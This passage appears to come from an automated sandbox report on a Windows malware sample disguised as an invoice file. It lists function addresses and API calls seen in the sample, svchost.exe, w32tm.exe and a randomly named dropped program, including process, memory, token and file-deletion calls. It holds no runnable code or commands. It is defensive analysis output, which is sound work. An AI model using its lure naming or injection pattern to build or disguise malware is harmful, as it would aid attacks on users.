                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_03952DB0 NtEnumerateKey,3_2_03952DB0
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_03952D00 NtSetInformationFile,3_2_03952D00
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_03952CC0 NtQueryVirtualMemory,3_2_03952CC0
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_03952CF0 NtOpenProcess,3_2_03952CF0
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_03952C00 NtQueryInformationProcess,3_2_03952C00
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_03953090 NtSetValueKey,3_2_03953090
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_03953010 NtOpenDirectoryObject,3_2_03953010
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_03953D10 NtOpenProcessToken,3_2_03953D10
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_03953D70 NtOpenThread,3_2_03953D70
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_00DF96A0 NtCreateFile,3_2_00DF96A0
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_00DF9810 NtReadFile,3_2_00DF9810
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_00DF99C0 NtClose,3_2_00DF99C0
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_00DF9910 NtDeleteFile,3_2_00DF9910
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_00DF9B20 NtAllocateVirtualMemory,3_2_00DF9B20
                Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeCode function: 0_2_0094D5EB: CreateFileW,DeviceIoControl,CloseHandle,0_2_0094D5EB
                Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeCode function: 0_2_00941201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00941201
                Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeCode function: 0_2_0094E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_0094E8F6
                Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeCode function: 0_2_009520460_2_00952046
                Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeCode function: 0_2_008E80600_2_008E8060
                Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeCode function: 0_2_009482980_2_00948298
                Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeCode function: 0_2_0091E4FF0_2_0091E4FF
                Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeCode function: 0_2_0091676B0_2_0091676B
                Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeCode function: 0_2_009748730_2_00974873
                Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeCode function: 0_2_0090CAA00_2_0090CAA0
                Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeCode function: 0_2_008ECAF00_2_008ECAF0
                Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeCode function: 0_2_008FCC390_2_008FCC39
                Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeCode function: 0_2_00916DD90_2_00916DD9
                Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeCode function: 0_2_008E91C00_2_008E91C0
                Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeCode function: 0_2_008FB1190_2_008FB119
                Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeCode function: 0_2_009013940_2_00901394
                Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeCode function: 0_2_009017060_2_00901706
                Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeCode function: 0_2_0090781B0_2_0090781B
                Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeCode function: 0_2_009019B00_2_009019B0
                Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeCode function: 0_2_008E79200_2_008E7920
                Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeCode function: 0_2_008F997D0_2_008F997D
                Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeCode function: 0_2_00907A4A0_2_00907A4A
                Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeCode function: 0_2_00907CA70_2_00907CA7
                Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeCode function: 0_2_00901C770_2_00901C77
                Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeCode function: 0_2_00919EEE0_2_00919EEE
                Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeCode function: 0_2_0096BE440_2_0096BE44
                Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeCode function: 0_2_00901F320_2_00901F32
                Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeCode function: 0_2_041C08800_2_041C0880
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00418B731_2_00418B73
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004030901_2_00403090
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004103131_2_00410313
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0042F3331_2_0042F333
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00402BC01_2_00402BC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004014201_2_00401420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00416D6E1_2_00416D6E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00416D731_2_00416D73
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040E5131_2_0040E513
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004105331_2_00410533
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040E6571_2_0040E657
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040E6631_2_0040E663
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040E6AC1_2_0040E6AC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004027501_2_00402750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362D34C1_2_0362D34C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036FA3521_2_036FA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F132D1_2_036F132D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364E3F01_2_0364E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037003E61_2_037003E6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0368739A1_2_0368739A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E02741_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E12ED1_2_036E12ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365D2F01_2_0365D2F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365B2C01_2_0365B2C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C02C01_2_036C02C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036452A01_2_036452A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0367516C1_2_0367516C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362F1721_2_0362F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0370B16B1_2_0370B16B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C81581_2_036C8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036301001_2_03630100
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DA1181_2_036DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F81CC1_2_036F81CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364B1B01_2_0364B1B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037001AA1_2_037001AA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F70E91_2_036F70E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036FF0E01_2_036FF0E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036EF0CC1_2_036EF0CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036470C01_2_036470C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036407701_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036647501_2_03664750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363C7C01_2_0363C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036FF7B01_2_036FF7B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365C6E01_2_0365C6E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F16CC1_2_036F16CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F75711_2_036F7571
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036405351_2_03640535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DD5B01_2_036DD5B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037005911_2_03700591
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036314601_2_03631460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F24461_2_036F2446
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036FF43F1_2_036FF43F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036EE4F61_2_036EE4F6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036FFB761_2_036FFB76
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036FAB401_2_036FAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B5BF01_2_036B5BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0367DBF91_2_0367DBF9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F6BD71_2_036F6BD7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365FB801_2_0365FB80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B3A6C1_2_036B3A6C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036FFA491_2_036FFA49
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F7A461_2_036F7A46
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036EDAC61_2_036EDAC6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DDAAC1_2_036DDAAC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03685AA01_2_03685AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363EA801_2_0363EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036569621_2_03656962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036499501_2_03649950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365B9501_2_0365B950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036429A01_2_036429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0370A9A61_2_0370A9A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036428401_2_03642840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364A8401_2_0364A840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AD8001_2_036AD800
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036438E01_2_036438E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366E8F01_2_0366E8F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036268B81_2_036268B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B4F401_2_036B4F40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03682F281_2_03682F28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03660F301_2_03660F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036FFF091_2_036FFF09
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03632FC81_2_03632FC8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036BEFA01_2_036BEFA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036FFFB11_2_036FFFB1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03641F921_2_03641F92
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640E591_2_03640E59
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036FEE261_2_036FEE26
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036FEEDB1_2_036FEEDB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03649EB01_2_03649EB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03652E901_2_03652E90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036FCE931_2_036FCE93
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F7D731_2_036F7D73
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03643D401_2_03643D40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F1D5A1_2_036F1D5A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364AD001_2_0364AD00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363ADE01_2_0363ADE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365FDC01_2_0365FDC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03658DBF1_2_03658DBF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B9C321_2_036B9C32
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640C001_2_03640C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03630CF21_2_03630CF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036FFCF21_2_036FFCF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E0CB51_2_036E0CB5
                Source: C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exeCode function: 2_2_03E80AF62_2_03E80AF6
                Source: C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exeCode function: 2_2_03E80AAD2_2_03E80AAD
                Source: C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exeCode function: 2_2_03E80AA12_2_03E80AA1
                Source: C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exeCode function: 2_2_03E891B82_2_03E891B8
                Source: C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exeCode function: 2_2_03E891BD2_2_03E891BD
                Source: C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exeCode function: 2_2_03E8297D2_2_03E8297D
                Source: C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exeCode function: 2_2_03E8095D2_2_03E8095D
                Source: C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exeCode function: 2_2_03EA177D2_2_03EA177D
                Source: C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exeCode function: 2_2_03E8275D2_2_03E8275D
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_0392E3F03_2_0392E3F0
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_039E03E63_2_039E03E6
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_039DA3523_2_039DA352
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_039A02C03_2_039A02C0
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_039C02743_2_039C0274
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_039E01AA3_2_039E01AA
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_039D81CC3_2_039D81CC
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_039BA1183_2_039BA118
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_039101003_2_03910100
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_039A81583_2_039A8158
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_039B20003_2_039B2000
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_0391C7C03_2_0391C7C0
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_039447503_2_03944750
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_039207703_2_03920770
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_0393C6E03_2_0393C6E0
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_039E05913_2_039E0591
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_039205353_2_03920535
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_039CE4F63_2_039CE4F6
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_039C44203_2_039C4420
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_039D24463_2_039D2446
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_039D6BD73_2_039D6BD7
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_039DAB403_2_039DAB40
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_0391EA803_2_0391EA80
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_039229A03_2_039229A0
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_039EA9A63_2_039EA9A6
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_039369623_2_03936962
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_039068B83_2_039068B8
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_0394E8F03_2_0394E8F0
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_039228403_2_03922840
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_0392A8403_2_0392A840
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_0399EFA03_2_0399EFA0
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_03912FC83_2_03912FC8
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_03940F303_2_03940F30
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_039C2F303_2_039C2F30
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_03962F283_2_03962F28
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_03994F403_2_03994F40
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_03932E903_2_03932E90
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_039DCE933_2_039DCE93
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_039DEEDB3_2_039DEEDB
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_039DEE263_2_039DEE26
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_03920E593_2_03920E59
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_03938DBF3_2_03938DBF
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_0391ADE03_2_0391ADE0
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_039BCD1F3_2_039BCD1F
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_0392AD003_2_0392AD00
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_039C0CB53_2_039C0CB5
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_03910CF23_2_03910CF2
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_03920C003_2_03920C00
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_0396739A3_2_0396739A
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_039D132D3_2_039D132D
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_0390D34C3_2_0390D34C
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_039252A03_2_039252A0
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_0393B2C03_2_0393B2C0
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_0393D2F03_2_0393D2F0
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_039C12ED3_2_039C12ED
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_0392B1B03_2_0392B1B0
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_0390F1723_2_0390F172
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_039EB16B3_2_039EB16B
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_0395516C3_2_0395516C
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_039CF0CC3_2_039CF0CC
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_039270C03_2_039270C0
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_039D70E93_2_039D70E9
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_039DF0E03_2_039DF0E0
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_039DF7B03_2_039DF7B0
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_039D16CC3_2_039D16CC
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_039BD5B03_2_039BD5B0
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_039D75713_2_039D7571
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_039DF43F3_2_039DF43F
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_039114603_2_03911460
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_0393FB803_2_0393FB80
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_03995BF03_2_03995BF0
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_0395DBF93_2_0395DBF9
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_039DFB763_2_039DFB76
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_03965AA03_2_03965AA0
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_039BDAAC3_2_039BDAAC
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_039C1AA33_2_039C1AA3
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_039CDAC63_2_039CDAC6
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_039DFA493_2_039DFA49
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_039D7A463_2_039D7A46
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_03993A6C3_2_03993A6C
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_039B59103_2_039B5910
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_039299503_2_03929950
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_0393B9503_2_0393B950
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_039238E03_2_039238E0
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_0398D8003_2_0398D800
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_03921F923_2_03921F92
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_039DFFB13_2_039DFFB1
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_039DFF093_2_039DFF09
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_03929EB03_2_03929EB0
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_0393FDC03_2_0393FDC0
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_039D1D5A3_2_039D1D5A
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_03923D403_2_03923D40
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_039D7D733_2_039D7D73
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_039DFCF23_2_039DFCF2
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_03999C323_2_03999C32
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_00DE21803_2_00DE2180
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_00DFC0103_2_00DFC010
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_00DDCFF03_2_00DDCFF0
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_00DDB1F03_2_00DDB1F0
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_00DDD2103_2_00DDD210
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_00DDB3893_2_00DDB389
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_00DDB3403_2_00DDB340
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_00DDB3343_2_00DDB334
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_00DE58503_2_00DE5850
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_00DE3A503_2_00DE3A50
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_00DE3A4B3_2_00DE3A4B
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_0363E3843_2_0363E384
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_0363E2683_2_0363E268
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_0363E7213_2_0363E721
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_0363D7E83_2_0363D7E8
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: String function: 03967E54 appears 99 times
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: String function: 0399F290 appears 103 times
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: String function: 03955130 appears 58 times
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: String function: 0398EA12 appears 86 times
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: String function: 0390B970 appears 262 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03675130 appears 36 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 036BF290 appears 103 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 036AEA12 appears 86 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0362B970 appears 250 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03687E54 appears 93 times
                Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeCode function: String function: 008FF9F2 appears 31 times
                Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeCode function: String function: 00900A30 appears 46 times
                Source: Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe, 00000000.00000003.1704571921.0000000004373000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe
                Source: Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe, 00000000.00000003.1702942544.00000000046AD000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe
